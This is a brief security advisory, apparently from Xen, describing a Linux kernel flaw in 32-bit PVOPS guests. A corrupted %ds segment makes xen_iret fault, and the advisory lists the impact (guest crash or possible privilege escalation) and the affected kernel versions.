Linux kernel hits general protection if %ds is corrupt for 32-bit PVOPS.

ISSUE DESCRIPTION

Linux kernel when returning from an iret assumes that %ds segment is safe and uses it to reference various per-cpu related fields. Unfortunately the user can modify the LDT and provide a NULL one. Whenever an iret is called we end up in xen_iret and try to use the %ds segment and cause an general protection fault.

IMPACT

Malicious or buggy unprivileged user space can cause the guest kernel to crash, or permit a privilege escalation within the guest, or operate erroneously.

VULNERABLE SYSTEMS

All 32bit PVOPS versions of Linux are affected, since the introduction of Xen PVOPS support in 2.6.23. Classic-Xen kernels are not vulnerable.